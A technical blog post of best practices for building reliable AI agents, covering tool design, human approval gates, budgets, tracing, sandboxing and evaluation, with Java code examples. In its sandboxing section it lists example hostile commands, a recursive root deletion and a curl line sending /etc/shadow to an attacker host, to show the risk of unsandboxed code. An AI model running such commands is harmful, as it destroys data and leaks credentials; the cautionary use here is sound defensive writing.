AI Agents Best Practices: Building Reliable, Safe, and Effective Agent Systems

AI agents — systems that use an LLM to reason, plan, and act in a loop — are among the most powerful patterns in modern AI engineering. They are also among the most fragile. A well-designed agent can autonomously resolve customer issues, write and ship code, or orchestrate multi-step research workflows. A poorly designed one will loop forever, burn through your API budget, take destructive actions, and produce confidently wrong results.

This post distils the best practices for building production-grade AI agents, catalogues the most common mistakes (and how to avoid them), and grounds everything in real-world examples and primary sources you can trace.

1. Start Simple, Then Layer Complexity

The single most important principle in agent design is incremental complexity. Most agent failures in practice stem not from missing capabilities, but from premature architectural complexity.

The Practice

Begin with the simplest architecture that could work:

Single LLM call — Can prompt engineering solve this without an agent at all?
Single-agent ReAct loop — One LLM with a few well-chosen tools in a reason → act → observe cycle.
Multi-agent collaboration — Only when a single agent demonstrably fails due to context limits, role confusion, or task breadth.

Architecture ladder showing the progression from a single LLM call to a single-agent ReAct loop and finally to a multi-agent system. — **Figure:** Escalate from prompt-only flows to single-agent loops and only then to multi-agent orchestration when the simpler design clearly fails.

“The best agent is the simplest one that solves your problem.” — Harrison Chase, CEO of LangChain (LangChain Blog, 2024)

Why It Matters

Every additional agent, tool, or orchestration layer multiplies the failure surface. A multi-agent system with 4 agents making 10 tool calls each has 40 potential failure points in a single run. Anthropic’s research on agent design explicitly recommends “building agents with LLMs” by starting with augmented LLMs and only graduating to full agents when simpler patterns fall short.

Common Mistake: Over-Engineering from Day One

Teams frequently start with a multi-agent orchestration framework (CrewAI, AutoGen, LangGraph) before proving that a single ReAct agent can’t handle the task. This leads to:

Debugging nightmares — When something goes wrong in a 4-agent pipeline, isolating the failure requires tracing across multiple agent contexts.
Inflated costs — Each agent in the pipeline makes its own LLM calls; a 4-agent system easily costs 4–10× more than a single agent.
Slower iteration — Changing one agent’s behaviour can have cascading effects on others.

How to avoid it: Build a single-agent prototype first. Measure where it fails. Only add agents to address specific, documented shortcomings.

❌ Day 1: "We need a researcher agent, a planner agent, a coder agent,
          and a reviewer agent orchestrated by a supervisor."

✅ Day 1: "Let's build one ReAct agent with search and code-execution tools.
          We'll add specialization only if it can't handle the task."

2. Design Tools for the LLM, Not for Humans

Tools are the agent’s hands. The quality of your tool design is often the single biggest lever on agent reliability — more impactful than prompt engineering or model selection.

The Practice

Design every tool as if the LLM is a new developer reading the API documentation for the first time:

Clear, descriptive names — search_customer_orders is better than query_db. The LLM uses the tool name and description to decide when to call it.
Narrow scope — One tool, one job. A get_order_status(order_id) tool is far more reliable than a generic run_sql(query) tool.
Structured inputs and outputs — Use explicit JSON schemas with required fields, enums, and descriptions. Return structured data, not free text.
Actionable error messages — Return errors that tell the agent what went wrong and what to try next, not generic “500 Internal Server Error.”
Idempotent where possible — Tools that can be safely retried reduce failure cascading.

If your tools will be consumed by agents across frameworks, publish them as MCP servers. The Model Context Protocol standardizes how agents discover, describe, and call tools regardless of the underlying LLM or agent framework. Designing tools that follow MCP’s conventions — typed parameters, clear descriptions, scoped capabilities — naturally enforces most of the principles above and makes your tools interoperable across LangGraph, Spring AI, OpenAI Agents SDK, and other agent runtimes out of the box.

Why It Matters

The Toolformer paper (Schick et al., 2023) demonstrated that LLMs select tools based primarily on their descriptions. Vague or overlapping tool descriptions cause the model to pick the wrong tool or call tools with incorrect parameters — a failure mode that compounds across multi-step agent runs.

OpenAI’s own function calling best practices emphasise that “the description field is the most important part of a function definition” and recommend writing descriptions “as if you are writing documentation for a junior developer.”

Example: Good vs. Bad Tool Design

{
  "bad_tool": {
    "name": "db",
    "description": "Query the database",
    "parameters": {
      "q": { "type": "string" }
    }
  },
  "good_tool": {
    "name": "get_customer_order_history",
    "description": "Retrieve the last N orders for a customer. Returns order ID, date, total, and status. Use this when the user asks about their past orders or order history.",
    "parameters": {
      "customer_id": {
        "type": "string",
        "description": "The unique customer identifier (e.g., 'CUST-12345')"
      },
      "limit": {
        "type": "integer",
        "description": "Maximum number of orders to return (default: 10, max: 50)",
        "default": 10
      },
      "status_filter": {
        "type": "string",
        "enum": ["all", "pending", "shipped", "delivered", "cancelled"],
        "description": "Filter orders by status. Use 'all' to return orders of any status.",
        "default": "all"
      }
    },
    "required": ["customer_id"]
  }
}

Common Mistake: Giving the Agent a Swiss-Army-Knife Tool

A single execute_sql(query) or run_code(code) tool gives the agent maximum flexibility — and maximum opportunity to cause damage. The agent can write arbitrary queries, access tables it shouldn’t, or construct malformed SQL that corrupts data.

How to avoid it: Decompose broad capabilities into narrow, purpose-built tools. If the agent needs to access order data, give it get_order(id), search_orders(customer_id, date_range), and cancel_order(order_id) — not raw database access.

3. Implement Human-in-the-Loop for High-Stakes Actions

Not every tool call should execute automatically. High-stakes actions require human approval before execution.

The Practice

Classify every tool into one of three tiers:

Tier	Risk Level	Examples	Approval
Read-only	Low	Search, fetch data, read files	Auto-execute
Reversible writes	Medium	Create draft, add to cart, stage changes	Auto-execute with logging
Irreversible / high-impact	High	Send email, delete records, deploy code, process payment	Require human approval

Implement a confirmation gate that pauses the agent loop before executing high-risk tools and presents the proposed action to the user for review.

Human approval gate where an agent proposes a sensitive action and a person can approve, reject, or modify it before execution. — **Figure:** A confirmation gate interrupts the loop before sensitive actions and gives a human reviewer the final say.

Why It Matters

OWASP’s Top 10 for LLM Applications identifies “Excessive Agency” as a critical risk: agents that autonomously perform actions with real-world consequences without adequate oversight. The risk is amplified by prompt injection — a malicious instruction embedded in a retrieved document or user input can hijack the agent into calling destructive tools.

Anthropic’s building effective agents guide explicitly recommends human-in-the-loop controls: “For high-stakes tasks, build in confirmation steps where the agent presents its planned actions for approval before executing.”

Example: Confirmation Gate in Spring AI

import java.util.Map;
import java.util.Scanner;
import java.util.Set;

import org.springframework.ai.chat.client.ChatClient;
import org.springframework.ai.tool.annotation.Tool;
import org.springframework.ai.tool.annotation.ToolParam;
import org.springframework.stereotype.Component;

@Component
public class CustomerServiceAgent {

    private static final Set<String> SENSITIVE_TOOLS = Set.of(
        "sendEmail", "deleteRecord", "processRefund"
    );

    private final ChatClient chatClient;
    private final Scanner scanner = new Scanner(System.in);

    public CustomerServiceAgent(ChatClient.Builder builder) {
        this.chatClient = builder
            .defaultSystem("You are a customer service agent.")
            .defaultTools(this)   // Register @Tool methods on this bean
            .build();
    }

    @Tool(description = "Process a refund for a customer order. "
        + "Use when the customer requests a refund and the order is eligible.")
    String processRefund(
            @ToolParam(description = "Order ID, e.g. 'ORD-789'") String orderId,
            @ToolParam(description = "Refund amount in USD") double amount) {

        // APPROVE / REJECT / MODIFY gate before any high-impact action
        Map<String, Object> reviewedArgs = reviewSensitiveAction(
            "processRefund", Map.of("orderId", orderId, "amount", amount));

        String reviewedOrderId = (String) reviewedArgs.get("orderId");
        double reviewedAmount = ((Number) reviewedArgs.get("amount")).doubleValue();
        return refundService.process(reviewedOrderId, reviewedAmount);
    }

    /** Interrupt the agent loop for human review of sensitive actions. */
    private Map<String, Object> reviewSensitiveAction(String toolName,
                                                      Map<String, Object> args) {
        System.out.printf("%n⚠️  Agent wants to execute: %s%n", toolName);
        System.out.printf("   Arguments: %s%n", args);
        System.out.print("   Decision? (approve/reject/modify): ");

        String decision = scanner.nextLine().trim().toLowerCase();
        return switch (decision) {
            case "approve" -> args;
            case "reject" -> throw new ToolExecutionException(
                "Action rejected by human reviewer.");
            case "modify" -> {
                System.out.print("   Enter updated refund amount USD: ");
                double updatedAmount = Double.parseDouble(scanner.nextLine().trim());
                yield Map.of("orderId", args.get("orderId"), "amount", updatedAmount);
            }
            default -> throw new ToolExecutionException(
                "Invalid decision. Expected approve, reject, or modify.");
        };
    }
}

Common Mistake: “The Agent Is Autonomous, So No Human Oversight Needed”

Teams that deploy agents with full write access to production systems — email, databases, deployment pipelines — without any approval gates inevitably face an incident where the agent takes an unintended destructive action. The 2024 Air Canada chatbot case — where an AI agent made up a bereavement discount policy and the company was held liable — illustrates the real-world legal and financial consequences.

How to avoid it: Default to requiring approval for any action that modifies external state. Relax constraints only after thorough testing and with robust logging.

4. Set Budgets and Guardrails to Prevent Runaway Agents

Agents operate in a loop. Without explicit limits, they can loop indefinitely, consuming unbounded tokens and time.

The Practice

Enforce hard limits on every agent run:

Maximum steps — Cap the number of reasoning-action iterations (e.g., 15–25 steps for most tasks).
Maximum tokens — Set a per-run token budget to prevent cost explosions.
Maximum wall-clock time — Timeout runs that exceed a reasonable duration.
Maximum tool calls per tool — Prevent the agent from repeatedly calling the same failing tool.
Fallback behaviour — When a limit is hit, the agent should gracefully return a partial result or escalate to a human, not crash silently.

Budget guardrails diagram showing an agent loop bounded by limits for steps, tokens, runtime, and retries, with a fallback path to a partial result or human escalation. — **Figure:** Guardrails bound the agent loop with explicit limits and a graceful fallback instead of letting retries run forever.

Why It Matters

The SWE-bench analysis (Yang et al., 2024) showed that autonomous coding agents average 20–50 LLM calls per issue. Without caps, a confused agent can easily make 100+ calls on a single task, burning through hundreds of thousands of tokens. At typical frontier-model pricing, a single runaway agent task can cost $5–$50 — and in a multi-tenant system, this adds up fast.

Harrison Chase, in his 2024 talk on agent reliability, noted that “the most common production agent bug is an infinite loop where the agent keeps retrying the same failing tool call.” Budget limits are the simplest and most effective mitigation.

Example: Budget Configuration

import java.util.HashMap;
import java.util.Map;
import java.util.concurrent.*;

import org.springframework.ai.chat.client.ChatClient;
import org.springframework.ai.chat.metadata.Usage;
import org.springframework.ai.chat.model.ChatResponse;

record BudgetConfig(int maxSteps, int maxTokens, int maxRetriesPerTool, long maxSeconds) {}
record BudgetResult(String status, String message, ChatResponse response) {}

BudgetConfig config = new BudgetConfig(25, 50_000, 3, 60);
Map<String, Integer> toolRetries = new HashMap<>();

ChatClient agent = ChatClient.builder(chatModel)
    .defaultSystem("You are a customer service agent.")
    .defaultTools(orderTools, searchTools)
    .defaultAdvisors(new MaxIterationsAdvisor(config.maxSteps())) // Step Limit
    .build();

public BudgetResult runWithBudget(ChatClient agent,
                                  String userMessage,
                                  BudgetConfig config,
                                  Map<String, Integer> toolRetries) {
    ExecutorService executor = Executors.newSingleThreadExecutor();
    Future<BudgetResult> future = executor.submit(() -> {
        try {
            ChatResponse response = agent.prompt().user(userMessage).call().chatResponse();

            Usage usage = response.getMetadata().getUsage();
            int totalTokens = usage == null ? 0 : usage.getTotalTokens();
            if (totalTokens > config.maxTokens()) {
                return new BudgetResult(
                    "partial",
                    "Token budget exceeded. Returning partial result and escalating.",
                    response
                );
            }

            return new BudgetResult("success", "Completed within guardrails.", response);
        } catch (ToolExecutionException ex) {
            int retries = toolRetries.merge(ex.getToolName(), 1, Integer::sum);
            if (retries >= config.maxRetriesPerTool()) {
                return new BudgetResult(
                    "partial",
                    "Retry cap hit for tool '" + ex.getToolName()
                        + "'. Returning partial result.",
                    null
                );
            }
            throw ex;
        }
    });

    try {
        return future.get(config.maxSeconds(), TimeUnit.SECONDS); // Timeout
    } catch (TimeoutException e) {
        future.cancel(true);
        return new BudgetResult(
            "escalated",
            "Timeout hit after " + config.maxSeconds() + "s. Escalating to human.",
            null
        );
    } catch (Exception e) {
        return new BudgetResult(
            "partial",
            "Unexpected failure. Returning partial result and logging incident.",
            null
        );
    } finally {
        executor.shutdownNow();
    }
}

Common Mistake: No Limits on Agent Loops

Without explicit budgets, agents that encounter ambiguous tasks or flaky tools will retry indefinitely. This manifests as:

Cost spikes — A single agent run consuming $10–$50 in API calls.
Latency blowouts — Users waiting 5+ minutes for a response that should take 15 seconds.
Cascading failures — A stuck agent holding resources that block other requests.

How to avoid it: Set conservative limits from day one. A 25-step limit and 60-second timeout are reasonable starting points for most use cases. Monitor and adjust based on production telemetry.

5. Invest in Observability and Tracing

You cannot improve what you cannot see. Agent observability is not optional — it is prerequisite to reliability.

The Practice

Log every step of the agent loop with full fidelity:

What to Log	Why
LLM reasoning traces (chain-of-thought)	Understand why the agent chose an action
Tool calls (name, arguments)	Audit what the agent did
Tool outputs (full response)	Trace data flow and identify bad inputs
Token counts per step	Cost attribution and budget monitoring
Latency per step	Identify bottlenecks
Final outcome (success/failure/timeout)	Measure overall reliability
Error messages and retries	Debug failure patterns

Observability trace diagram showing an agent run broken into logged steps including reasoning, tool calls, outputs, and the final outcome with attached metrics. — **Figure:** A useful agent trace records the full trajectory — reasoning, actions, outputs, timing, and outcome — not just the final answer.

Use a dedicated LLM observability platform rather than ad-hoc logging:

LangSmith — Full trajectory tracing, evaluation datasets, and prompt versioning for LangChain/LangGraph agents.
Arize Phoenix — Open-source LLM observability with trace visualization and embedding drift monitoring.
Braintrust — Evaluation and logging platform with support for agent trajectory scoring.
OpenTelemetry / Micrometer — Standard distributed-tracing protocols. Spring AI auto-instruments every LLM call and tool invocation via Micrometer observations, feeding traces into any OTel-compatible backend (Jaeger, Grafana Tempo, Datadog) with no custom code.

Why It Matters

The AgentBench paper (Liu et al., 2024) highlighted that agent evaluation is fundamentally different from traditional NLP evaluation. Success depends on the entire trajectory, not just the final answer. An agent that produces the right answer via a dangerous or wasteful path is still a failure from a production standpoint.

Chip Huyen, in AI Engineering (O’Reilly, 2025), dedicates an entire chapter to LLM application observability, arguing that “without tracing, you are debugging LLM applications with a blindfold on.” This applies doubly to agents, where a single run can span dozens of intermediate states.

Common Mistake: Logging Only the Final Answer

Teams that log only the agent’s final output lose all visibility into the reasoning process. When the agent produces a wrong answer or takes an unexpected action, there is no trail to diagnose the root cause — was it a bad tool call? A hallucinated plan? A retrieval failure?

How to avoid it: Instrument every step from day one. Treat agent traces like distributed system traces — each step is a “span” in the trajectory. Platforms like LangSmith render these as visual timelines, making debugging tractable.

[Step 1] LLM Reasoning: "The user wants to cancel order ORD-789. I need to look up the order first."
[Step 2] Tool Call: get_order(order_id="ORD-789")
[Step 3] Tool Output: {"status": "shipped", "carrier": "FedEx", "tracking": "FX123456"}
[Step 4] LLM Reasoning: "The order is already shipped. I should inform the user and offer alternatives."
[Step 5] Final Answer: "Order ORD-789 has already shipped via FedEx (tracking: FX123456)..."
         ✅ Success | 5 steps | 1,847 tokens | 2.3s

6. Sandbox All Code Execution

If your agent executes code — and many do — that code must run in an isolated sandbox, never on the host system.

The Practice

Use containerized environments — Docker, E2B, or Firecracker microVMs provide process-level isolation.
Restrict network access — The sandbox should have no access to internal networks, production databases, or cloud metadata services unless explicitly granted.
Restrict filesystem access — Mount only the directories the agent needs, read-only where possible.
Time-limit execution — Kill processes that exceed a wall-clock timeout (e.g., 30 seconds for code execution).
Drop privileges — Run as a non-root user with minimal permissions.

Sandbox boundary diagram separating the host system from an isolated execution container with restricted network, filesystem, and time limits for agent-generated code. — **Figure:** Agent-generated code should cross a hard isolation boundary into a constrained sandbox instead of running on the host.

Why It Matters

The OWASP Top 10 for LLM Applications lists “Insecure Output Handling” and “Excessive Agency” as top risks. An agent that generates and executes code on the host system is one prompt injection away from data exfiltration, resource abuse, or system compromise.

Simon Willison, a leading voice on LLM security, has extensively documented how prompt injection in multi-modal and tool-using LLMs can lead to arbitrary code execution when sandboxing is absent.

Example: Sandboxed Code Execution with Docker

import java.util.concurrent.TimeUnit;
import java.util.concurrent.TimeoutException;

import com.github.dockerjava.api.DockerClient;
import com.github.dockerjava.api.command.CreateContainerResponse;
import com.github.dockerjava.api.command.LogContainerResultCallback;
import com.github.dockerjava.api.command.WaitContainerResultCallback;
import com.github.dockerjava.api.model.Bind;
import com.github.dockerjava.api.model.HostConfig;
import com.github.dockerjava.core.DockerClientBuilder;

DockerClient docker = DockerClientBuilder.getInstance().build();

// The agent generates this code based on user request
String agentCode = """
    import pandas as pd
    df = pd.read_csv('/data/sales_data.csv')
    summary = df.groupby('region')['revenue'].sum() \\
                .sort_values(ascending=False)
    print(summary.to_markdown())
    """;

CreateContainerResponse container = docker.createContainerCmd("python:3.13-slim")
    .withCmd("python", "-c", agentCode)
    .withUser("1000:1000")                    // Drop privileges: run as non-root
    .withHostConfig(HostConfig.newHostConfig()
        .withNetworkMode("none")              // No network access
        .withReadonlyRootfs(true)             // Read-only filesystem
        .withMemory(256 * 1024 * 1024L)      // 256 MB memory limit
        .withCpuCount(1L)                     // 1 CPU core
        .withBinds(Bind.parse(uploadDir + ":/data:ro"))) // Narrow read-only mount
    .exec();

try {
    docker.startContainerCmd(container.getId()).exec();

    // Hard timeout: kill runaway execution after 30 seconds
    Integer exitCode = docker.waitContainerCmd(container.getId())
        .exec(new WaitContainerResultCallback())
        .awaitStatusCode(30, TimeUnit.SECONDS);

    if (exitCode == null) {
        docker.killContainerCmd(container.getId()).exec();
        throw new TimeoutException("Execution exceeded 30s and was terminated.");
    }

    String output = docker.logContainerCmd(container.getId())
        .withStdOut(true)
        .exec(new LogContainerResultCallback())
        .awaitCompletion()
        .toString();

} finally {
    docker.removeContainerCmd(container.getId()).withForce(true).exec();
}

Common Mistake: Running Agent-Generated Code on the Host

Teams that use Runtime.exec() or ProcessBuilder to execute agent-generated code on the production host are creating a critical security vulnerability. A single prompt injection or hallucinated command can:

Delete files (rm -rf /)
Exfiltrate secrets (curl attacker.com -d @/etc/shadow)
Install malware or crypto miners
Pivot to other internal systems

How to avoid it: Never execute agent-generated code outside a sandbox. Treat all agent-generated code as untrusted input — because it is.

7. Use Structured Outputs for Deterministic Tool Calls

When agents communicate with tools and downstream systems, structured outputs eliminate an entire class of parsing failures.

The Practice

Force the LLM to produce tool calls and intermediate results as validated JSON conforming to explicit schemas. Most major LLM providers — OpenAI, Anthropic, Google, Mistral — now support constrained-decoding structured outputs natively. Use the provider-native feature or a framework that abstracts it:

OpenAI Structured Outputs — Guarantees JSON conformance via constrained decoding. Other providers (Anthropic, Google Gemini) offer equivalent features under different names.
Spring AI Structured Output — Map LLM responses directly to Java records and POJOs using BeanOutputConverter or the entity() API, with automatic JSON-schema generation. Works across all supported model providers.
Outlines — Grammar-constrained generation for open-source models.

Why It Matters

In an agent loop, the LLM’s output at each step is parsed to determine the next action. If the output is malformed — missing a required field, using the wrong type, or including unexpected text — the entire loop breaks. In production, Jason Liu (creator of Instructor) reports that structured output enforcement reduces agent tool-call failures by 30–50% compared to freeform text parsing.

Example: Structured Tool Call with Spring AI

import com.fasterxml.jackson.annotation.JsonPropertyDescription;

import org.springframework.ai.chat.client.ChatClient;

// Define the schema as a Java record — Spring AI generates the JSON schema automatically
public enum ToolChoice {
    SEARCH_KNOWLEDGE_BASE, GET_ORDER, ESCALATE_TO_HUMAN
}

public record AgentAction(
    @JsonPropertyDescription("Chain-of-thought reasoning for choosing this action")
    String reasoning,
    @JsonPropertyDescription("Which tool to call next")
    ToolChoice tool,
    @JsonPropertyDescription("Arguments to pass to the selected tool")
    Map<String, Object> arguments
) {}

// Spring AI guarantees the response conforms to the AgentAction schema
AgentAction action = chatClient.prompt()
    .system("You are a customer service agent. Select the appropriate tool.")
    .user("Where is my order ORD-456?")
    .call()
    .entity(AgentAction.class);

// action.tool() is guaranteed to be a valid ToolChoice enum value
// action.arguments() is guaranteed to be a Map
// No parsing errors, no malformed JSON

Common Mistake: Parsing Agent Output with Regex

Teams that extract tool calls from freeform LLM text using regex or string matching are building on sand. Model output format varies between calls, models, and versions. A single extra newline, misplaced comma, or markdown formatting artifact breaks the parser.

How to avoid it: Use constrained decoding or a structured output library. Never rely on the LLM to “usually” produce valid JSON — enforce it mechanically.

8. Evaluate Agents on Trajectories, Not Just Final Answers

Traditional evaluation (comparing output to a gold-standard answer) is insufficient for agents. Two agents can produce the same correct answer via wildly different paths — one efficient and safe, the other wasteful and risky.

The Practice

Evaluate agents on multiple dimensions:

Dimension	What to Measure	Example Metric
Correctness	Is the final answer right?	Exact match, F1, human rating
Efficiency	How many steps/tokens did it take?	Steps to completion, total tokens
Tool accuracy	Did it call the right tools with the right args?	Tool call precision/recall
Safety	Did it avoid forbidden actions?	Violation count
Recovery	Did it handle errors gracefully?	Recovery rate after tool failures
Cost	What did the run cost?	Total API spend per task

Build evaluation datasets of (task, expected trajectory, expected output) triples. Run the agent against this dataset regularly — ideally in CI/CD — to catch regressions.

Why It Matters

The AgentBench framework (Liu et al., 2024) demonstrated that evaluating agents on final answers alone misses critical failure modes. An agent that produces the right answer by reading a confidential file it shouldn’t have accessed is a security failure, not a success. The SWE-bench benchmark evaluates on full task resolution — the agent must produce a working patch, not just a plausible answer.

Chip Huyen in AI Engineering (O’Reilly, 2025) emphasises that “agent evaluation must be trajectory-aware” and recommends building evaluation harnesses that score intermediate steps, not just outcomes.

Common Mistake: “It Worked on My Demo”

A live demo where the agent completes a task is not an evaluation. Without a systematic dataset covering edge cases, error conditions, and adversarial inputs, you have no idea what your agent’s real failure rate is. When Devin launched in early 2024, it resolved just 13.86% of SWE-bench issues. Frontier models have since pushed SWE-bench Verified scores well above 50%, yet agents still fail on a significant share of real-world tasks — reinforcing the need for systematic evaluation over demo-driven confidence.

How to avoid it: Build a benchmark of 50–200 representative tasks from your domain. Run the agent against it weekly. Track pass rate, average steps, average cost, and safety violations over time. Treat it like a test suite.

9. Manage Context Window Carefully

The LLM’s context window is a scarce resource. In an agent loop, every reasoning step, tool call, and tool output accumulates in the context. Left unmanaged, the context fills up, performance degrades, and the agent starts losing track of earlier information.

The Practice

Summarize tool outputs — If a tool returns 5,000 tokens of raw data, summarize it to the relevant 200 tokens before appending to context.
Truncate conversation history — Keep the most recent N turns in full and summarize older turns.
Use retrieval over context — Instead of stuffing all relevant documents into context, store them externally and retrieve only what’s needed per step.
Reserve tokens for reasoning — If your model has a 128k context window, don’t fill 127k with data and leave only 1k for reasoning. A good rule of thumb is to reserve at least 20–30% of the window for the model’s own reasoning and output.

Why It Matters

The “Lost in the Middle” paper (Liu et al., 2024) demonstrated that LLMs perform significantly worse when critical information is placed in the middle of a long context — they attend best to the beginning and end. For agents, this means that tool outputs from early steps can get “buried” as the context grows, leading to the agent forgetting its own earlier findings.

MemGPT (Packer et al., 2023) addresses this by treating the context window like virtual memory — paging information in and out as needed — demonstrating that active context management is essential for long-running agent tasks.

Common Mistake: Appending Everything to Context

The default behaviour in most agent frameworks is to append every tool call and tool output to the conversation history verbatim. For tools that return large JSON payloads, database query results, or full web pages, this fills the context window in a few steps, causing:

Context overflow — The run fails when the accumulated context exceeds the model’s window.
Attention degradation — The model “forgets” important earlier context as the window fills.
Increased cost — Every subsequent LLM call includes the full context, multiplying token costs.

How to avoid it: Implement a context management strategy from the start. Summarize large tool outputs, drop irrelevant history, and use retrieval for information the agent might need later.

10. Implement Graceful Failure and Escalation

Agents will fail. The question is whether they fail gracefully — informing the user and escalating to a human — or silently — producing wrong results or hanging indefinitely.

The Practice

Design explicit failure modes:

Tool failure — If a tool call fails after 2–3 retries, stop retrying. Return a clear error message and either try an alternative approach or escalate.
Confidence signals — When the agent is uncertain, it should express uncertainty rather than confabulate. Instruct the agent in its system prompt: “If you are not confident in your answer, say so and suggest the user contact support.”
Escalation path — Every production agent should have a defined handoff to a human agent. This is not a failure — it is a design feature.
Partial results — When hitting a budget or time limit, return whatever useful work was completed rather than nothing.

Why It Matters

Klarna’s AI assistant handles two-thirds of customer service chats — but the remaining third is seamlessly escalated to human agents. This graceful escalation is a key part of why the system succeeds: it doesn’t try to handle cases it can’t. Sierra AI builds this pattern into every customer service agent they deploy — the agent knows when to stop and hand off.

In AI Engineering (O’Reilly, 2025), Chip Huyen notes that “the most reliable AI systems are those that know what they don’t know” and recommends designing explicit uncertainty signaling and escalation paths as first-class features, not afterthoughts.

Common Mistake: Letting the Agent Confabulate When It’s Stuck

When an agent can’t find the answer or a tool fails, the default LLM behaviour is to generate a plausible-sounding but fabricated response. In a customer service context, this means the agent invents policies, makes up order numbers, or provides incorrect instructions — leading to customer harm and legal liability.

How to avoid it: Add explicit instructions in the agent’s system prompt to acknowledge uncertainty. Validate critical facts against tool outputs before presenting them to the user. Implement a fallback that routes to a human when confidence is low.

System prompt excerpt:
"If you cannot find the information needed to answer the user's question
after using your available tools, do NOT make up an answer. Instead, respond:
'I wasn't able to find that information. Let me connect you with a team member
who can help.' Then call the escalate_to_human tool."

Real-World Examples: Best Practices in Action

GitHub Copilot Agent Mode

GitHub Copilot’s agent mode embodies several best practices simultaneously:

Starts simple — Begins by reading relevant files and understanding the context before making changes.
Narrow, well-designed tools — Has specific tools for file reading, file editing, terminal commands, and code search — not a single “do anything” tool.
Human-in-the-loop — Requires user approval before executing terminal commands that could modify the system.
Observability — Each step (reasoning, tool call, output) is visible to the user in the IDE.
Budget limits — Operates within the IDE session context, preventing unbounded execution.
Graceful failure — When it encounters errors, it reports them and suggests next steps rather than silently failing.

Klarna AI Assistant

Klarna’s production agent demonstrates enterprise-grade best practices:

Scoped tools — The agent has specific tools for order lookup, refund processing, and FAQ retrieval — not raw database access.
Human escalation — Seamlessly hands off to human agents for complex cases, maintaining conversation context during the handoff.
Structured outputs — Responses follow consistent templates for refund confirmations, status updates, and policy explanations.
Guardrails — The agent cannot offer unauthorized discounts, access accounts without verification, or perform actions outside its defined scope.
Evaluation — Klarna tracks resolution rate, customer satisfaction (CSAT), and escalation rate continuously, catching regressions early.

Voyager (Minecraft Agent)

The Voyager research agent demonstrates best practices in autonomous learning:

Incremental complexity — Starts with simple goals (collect wood) and progressively tackles harder challenges (build structures, navigate caves).
Skill library — Reusable, tested code snippets stored for retrieval, implementing the “structured outputs” principle for action code.
Self-verification — After executing an action, Voyager checks whether it succeeded and iterates if not — embodying the “evaluate trajectories” principle.
Context management — Only retrieves relevant skills from its library for the current task, rather than loading everything into context.

Agent-Mode Coding Assistants (2025–)

By 2025, multiple coding assistants shipped full agent modes — GitHub Copilot, Cursor, and Claude Code among them. Their independent convergence on the same design is strong evidence that these best practices are not theoretical but the proven foundation of production agent systems:

Iterative ReAct loop — Read files, reason about the codebase, make targeted changes, run tests, and iterate until the task is complete.
Narrow, well-scoped tools — File read, file edit, terminal, grep search, and semantic search are all separate, single-purpose tools — never a single “do anything” function.
Human-in-the-loop — Terminal commands and destructive file operations require explicit user approval before execution.
Full transparency — Every reasoning step, tool call, and tool output is visible to the developer in real time, embodying observability as a first-class feature.
Graceful failure — When the agent encounters errors, it reports them, suggests next steps, and stops rather than silently confabulating.

Best Practices Checklist

Use this as a quick reference when designing and reviewing agent systems:

#	Practice	Key Question
1	Start simple	Can a single agent with basic tools solve this?
2	Design tools for the LLM	Are tool names, descriptions, and schemas crystal clear?
3	Human-in-the-loop	Are high-stakes actions gated on human approval?
4	Budgets and guardrails	Are step, token, and time limits enforced?
5	Observability	Is every step of every run logged and traceable?
6	Sandbox code execution	Is all generated code running in an isolated environment?
7	Structured outputs	Are tool calls validated against schemas, not parsed from freeform text?
8	Trajectory evaluation	Are agents tested on full trajectories, not just final answers?
9	Context management	Is the context window actively managed and summarized?
10	Graceful failure	Does the agent know when to stop and escalate to a human?

References & Further Reading

Foundational Papers

ReAct — Yao, S. et al. “ReAct: Synergizing Reasoning and Acting in Language Models”, ICLR 2023. The reasoning-action loop pattern that underpins most modern agent architectures.
Toolformer — Schick, T. et al. “Toolformer: Language Models Can Teach Themselves to Use Tools”, NeurIPS 2023. Demonstrates that LLMs can learn when and how to call tools — making tool design critical to agent performance.
Reflexion — Shinn, N. et al. “Reflexion: Language Agents with Verbal Reinforcement Learning”, NeurIPS 2023. Agents that improve by reflecting on their own failures — a key self-correction best practice.
Voyager — Wang, G. et al. “Voyager: An Open-Ended Embodied Agent with Large Language Models”, 2023. Demonstrates skill libraries, self-verification, and incremental complexity in an autonomous agent.
MemGPT / Letta — Packer, C. et al. “MemGPT: Towards LLMs as Operating Systems”, 2023. Virtual memory management for agents — the foundation of context management best practices. The project evolved into Letta in 2024, an open-source framework for building stateful agents with long-term memory.
Lost in the Middle — Liu, N.F. et al. “Lost in the Middle: How Language Models Use Long Contexts”, TACL 2024. Reveals attention degradation in long contexts, motivating active context management for agents.
Tree of Thoughts — Yao, S. et al. “Tree of Thoughts: Deliberate Problem Solving with Large Language Models”, NeurIPS 2023. Extends chain-of-thought into a tree search over reasoning paths — a key planning technique for agents that need to explore alternatives rather than commit to a single trajectory. From the same team behind ReAct.
CoALA — Sumers, T.R. et al. “Cognitive Architectures for Language Agents”, TMLR 2024. A unifying framework that maps language agent designs to cognitive science concepts — memory, decision-making, grounding — clarifying architectural choices across single-agent and multi-agent patterns.

Evaluation and Benchmarks

AgentBench — Liu, X. et al. “AgentBench: Evaluating LLMs as Agents”, ICLR 2024. Comprehensive benchmark demonstrating why agents must be evaluated on trajectories, not just final outputs.
SWE-bench — Jimenez, C.E. et al. “SWE-bench: Can Language Models Resolve Real-World GitHub Issues?”, ICLR 2024. The gold-standard benchmark for coding agents — exposes the reliability gap in autonomous software engineering. SWE-bench Verified (2024) provides a human-validated subset with more reliable ground-truth labels.
SWE-Agent — Yang, J. et al. “SWE-agent: Agent-Computer Interfaces Enable Automated Software Engineering”, 2024. Reveals the cost and step count of autonomous coding agents, motivating budget limits.
GAIA — Mialon, G. et al. “GAIA: a benchmark for General AI Assistants”, ICLR 2024. Tests multi-step reasoning with tool use across web browsing, coding, and data analysis — the benchmark for evaluating general-purpose agent capabilities beyond coding tasks.
WebArena — Zhou, S. et al. “WebArena: A Realistic Web Environment for Building Autonomous Agents”, ICLR 2024. A self-hosted environment of real websites (e-commerce, forums, maps, GitLab) for evaluating web-based agents on end-to-end tasks with realistic human workflows.

Multi-Agent Systems

AutoGen — Wu, Q. et al. “AutoGen: Enabling Next-Gen LLM Applications via Multi-Agent Conversation”, 2023. Microsoft’s multi-agent framework — demonstrates when multi-agent architectures add value and when they add complexity. The v0.4 rewrite (AgentChat) in late 2024 introduced an event-driven, modular architecture for production multi-agent systems.
Agent Survey — Wang, L. et al. “A Survey on Large Language Model based Autonomous Agents”, 2023 (updated 2024). Comprehensive overview of agent architectures, planning strategies, and memory designs.
